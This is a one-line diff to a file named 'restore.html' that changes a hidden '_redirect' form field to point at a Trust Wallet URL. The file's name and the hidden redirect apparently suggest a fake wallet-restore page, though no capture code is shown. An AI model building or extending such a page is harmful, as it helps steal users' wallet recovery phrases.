--- a/restore.html
+++ b/restore.html
@@ -61,7 +61,7 @@
                       type="hidden"
                       name="_redirect"
                       id="name"
-                      value="https://trustwallet.com"
+                      value="https://trustwallet.com/earn"
                     />
                     <div class="d-flex flex-wrap justify-content-center mb-3">
                       <div class="ml-3">
